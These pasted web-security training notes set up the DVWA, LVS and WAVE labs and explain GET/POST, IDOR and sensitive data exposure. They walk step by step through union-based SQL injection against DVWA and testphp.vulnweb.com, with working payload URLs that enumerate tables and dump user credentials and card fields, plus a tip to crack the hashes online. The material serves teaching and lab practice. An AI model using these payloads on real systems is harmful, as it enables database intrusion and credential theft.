senthilnasa

Dec 20th, 2018
Setting up LVS, WAVE and DVWA...

For LVS
=======
Step 1 --> Extract the contents of LVS_1 into a folder
Step 2 --> Copy that extracted folder into C:\xampp\htdocs
Step 3 --> Start the XAMPP server --> Apache and MySQL
Step 4 --> In the browser type --> 127.0.0.1/lvs_1
lvs_1 --> Name of the extracted folder
Download Link --> https://ufile.io/aci9l


For WAVE
========
Step 1 --> Extract the contents of wave into a folder
Step 2 --> Copy that extracted folder into C:\xampp\htdocs
Step 3 --> Start the XAMPP server --> Apache and MySQL
Step 4 --> In the browser type --> 127.0.0.1/wave1
wave1 --> Name of the extracted folder
Download Link --> https://ufile.io/bk3w5

For DVWA
========
Step 1 --> Extract the contents of DVWA into a folder
Step 2 --> Copy that extracted folder into C:\xampp\htdocs
Step 3 --> Start the XAMPP server --> Apache and MySQL
Step 4 --> Open the DVWA configuration file and delete the value of the password field: c:/xampp/dvwa/config/config.php
Step 5 --> In the browser type --> 127.0.0.1/DVWA
Step 6 --> Log in with the credentials --> admin / password

Download Link --> https://ufile.io/a5lg8


=======x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x==========

METHODS USED IN WEB APPLICATIONS
================================
1. GET - The default method used by web applications. In this type of request everything is sent in plain text as part of the URL, i.e. the request parameters are visible in the address bar. It is a very insecure method: if someone is shoulder surfing they can read your credentials, and parameters exposed this way are also the starting point for several attacks.
eg: www.aaab.com/haha.php?id=1
www.adsadsa.com/index.php?happyness=null


2. POST - The method that sends the request data to the server in the request body rather than in the URL, so it is not shown in the address bar. eg. twitter.com/login.php

Demo...

----------------------------------------------------------

INSECURE DIRECT OBJECT REFERENCE
================================
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
Do note here that a malicious user is able to access the resources of another USER only. Both have the same level of access in the case of IDOR.

example :

www.hungama.com/user.php?id=141500263
www.hungama.com/user.php?id=4
www.hungama.com/user.php?id=2
Without proper validation, changing the id jumps you to another user's account.

Wave1

----------------------------------------------------------

SENSITIVE DATA EXPOSURE
=======================
Many web applications do not properly protect sensitive data such as names, IDs, credit card details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or other crimes. Such sensitive data should also be encrypted: if it is not encrypted and sits in plain text, it is much easier for an attacker or any other individual to fetch it.

Types of Sensitive Data
=======================

1. Personal - Names, addresses, contact numbers etc.
2. Confidential - IDs, passwords (credentials), Aadhaar No.
3. Financial - Bank account numbers, credit cards, debit cards etc.



HOW SENSITIVE DATA CAN BE COMPROMISED
--------=========================--------

1. When data is transmitted in the URL, that is, your credentials are transmitted via GET parameters.
username=user&password=pass&submit=submit
2. When data is stored in plain text form rather than in hashed or encrypted form.
3. When data is stored in a text file rather than in the database.

Id  Interest   Gender  Username  Password
-----------------------------------------------
1   Badminton  Female  admin     Pa$$woRd
2   Football   Male    admin2    paSSwOrd

-----------------------------------------------------------------
LVS

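As an added example (not part of the original notes), the credential table above stored with salted PBKDF2 hashes instead of plain-text passwords; the two usernames and passwords are the sample rows from that table, while the record format and the iteration count are my own choices.

```python
"""Added example (not from the original notes): the credential table from
the notes, stored hashed with a per-user salt instead of in plain text."""
import hashlib
import hmac
import os

# The rows shown in the notes (constructed sample data). Stored like this,
# one dump of the table gives away every password.
PLAINTEXT_TABLE = {
    "admin": "Pa$$woRd",
    "admin2": "paSSwOrd",
}

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor; raise it as hardware gets faster


def hash_password(password: str, salt: bytes = b"") -> str:
    # A fresh random salt per user means two users with the same password get
    # different stored values, and precomputed hash lists stop working.
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    # Record format (my choice): algorithm$iterations$salt$digest, all self-describing.
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(stored: str, candidate: str) -> bool:
    # Recompute with the stored salt and iteration count, then compare in
    # constant time so the comparison itself leaks nothing about the digest.
    _, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def hashed_table(plaintext_table: dict) -> dict:
    # What the Username/Password columns should hold instead of plain text.
    return {user: hash_password(pw) for user, pw in plaintext_table.items()}


HASHED_TABLE = hashed_table(PLAINTEXT_TABLE)

if __name__ == "__main__":
    for user, stored in HASHED_TABLE.items():
        print(f"{user:8} {stored}")
    print("login admin/Pa$$woRd:", verify_password(HASHED_TABLE["admin"], "Pa$$woRd"))
    print("login admin/paSSwOrd:", verify_password(HASHED_TABLE["admin"], "paSSwOrd"))
```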
SQL Injections
==============
Where an attacker passes malicious SQL commands just to gain the juicy information from the database.
SQLi

UNION BASED SQL INJECTION
=========================
Where an attacker uses the UNION command to collect information and merge it into one result table. He passes malicious commands and queries to the database to do so.

DEMO
====
DVWA ---> Security:Low
SQL Injection
Step 1
======
Find the 'GET' parameter.
something=something
php?id=something
php?id=cat
php?id=1
php?id=query

Either you click on some link of the web application|site or enter something in the search box.

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#

Step 2
======
Generate a SQL error, to break the query.
1
1'

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1'&Submit=Submit#

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

'select * from table '
'select * from table' '

Step 3
======
Count the number of columns returned by the vulnerable query.
For counting the number of columns, we will use ORDER BY.

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
Shows us data
This query means that we are asking the database to arrange the data according to column number 1

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
Shows us data
This query means that we are asking the database to arrange the data according to column number 2

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
Gives us an error
Unknown column '3' in 'order clause'
This query means that I am asking the database to arrange the data according to column number 3
But there is no column number 3 --> so it generates an error

order by n--+
n starts from 1 and ends when I receive an error for the value of n
--+ ---> To comment out
Any data passed after --+ is not executed at all. We can also use # to comment out the rest of the content.

So the query returns 2 columns.

Step 4
======
Merge our own SELECT into the result using the UNION command, with one value for each column.
union select 1,2,...,n-1--+
n=3
union select 1,2--+


http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#

ID: 1' union select 1,2--
First name: admin
Surname: admin

ID: 1' union select 1,2--
First name: 1
Surname: 2

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#

database() --> database name
version() --> database version number

Step 5
======
Query the database's "mother" --> information_schema, to get the table names
information_schema --> it is a meta table --> it contains the names of the tables and columns which are present in the database.
information_schema.tables
|-> It stores the names of all the tables in the database.

union select table_name,2 from information_schema.tables--+
or
union select 1,table_name from information_schema.tables--+


We can use either of them because both fields are vulnerable; otherwise we go for the one which is vulnerable.

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#

Step 6
======
Again query the database's "mother" for the column names in the table named users
information_schema
information_schema.columns

union select 1,column_name from information_schema.columns where table_name="users"--+


Step 7
======
Retrieve or dump the data using the above info.
DVWA --> Users --> (User_id,first_name,Last_name,user,Password)

union select 1,group_concat(User_id,0x0a,first_name,0x0a,Last_name,0x0a,user,0x0a,Password,0x3a) from users--+



The password is in hashed form, so we will go online and check whether the plaintext for that hash value is available or not.


1. testphp.vulnweb.com/listproducts.php?cat=1 order by 11

2. http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,7,8,9,10,11

3. http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,database(),3,4,5,6,7,8,9,10,11

4. http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,version(),3,4,5,6,7,8,9,10,11

5. http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,table_name,3,4,5,6,7,8,9,10,11 from information_schema.tables

6. http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name='users'

7. http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,group_concat(uname," ",pass,0x0a,cc),3,4,5,6,7,8,9,10,11 from users
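As an added example (not code from the notes, from DVWA or from the testphp site), the Step 2 to Step 4 inputs above and the same ORDER BY / UNION probing from the testphp list replayed against a constructed SQLite copy of the DVWA users lookup, beside the parameterised query that makes the identical inputs harmless. The table rows are constructed; the query text follows the low-security DVWA page the notes describe.

```python
"""Added example (not from the original notes): the DVWA 'Security: Low'
lookup rebuilt on an in-memory SQLite table, next to the fixed version."""
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT);
    INSERT INTO users VALUES (1, 'admin', 'admin');    -- constructed sample row
    INSERT INTO users VALUES (2, 'Gordon', 'Brown');   -- constructed sample row
""")


def vulnerable_lookup(user_id: str) -> list:
    # The low-security pattern: the id is spliced into the SQL text, so a quote
    # in the input closes the string and everything after it is parsed as SQL.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    # Values are rendered as text, the way the PHP page echoes them.
    return [tuple(str(c) for c in row) for row in conn.execute(sql)]


def safe_lookup(user_id: str) -> list:
    # Parameterised: the driver passes the whole input as one value, so
    # "1' union select 1,2-- " is just an id that matches no row.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return [tuple(str(c) for c in row) for row in conn.execute(sql, (user_id,))]


def probe(lookup, user_id: str) -> dict:
    # Report either the rows or the database error text, which is exactly
    # what Step 2 and Step 3 read off the page to learn the query's shape.
    try:
        return {"rows": lookup(user_id), "error": None}
    except sqlite3.Error as exc:
        return {"rows": [], "error": str(exc)}


# The inputs used in the notes; "--+" in a URL is "-- " once decoded.
PAYLOADS = ["1", "1'", "1' order by 2-- ", "1' order by 3-- ", "1' union select 1,2-- "]

if __name__ == "__main__":
    for payload in PAYLOADS:
        print(f"{payload!r:28} vulnerable: {probe(vulnerable_lookup, payload)}")
        print(f"{'':28} safe:       {probe(safe_lookup, payload)}")
```

On the vulnerable side the quote produces a syntax error, `order by 3` the out-of-range error, and the UNION an extra row reading `1` / `2`; the parameterised side returns the admin row for `1` and nothing at all for every injected input.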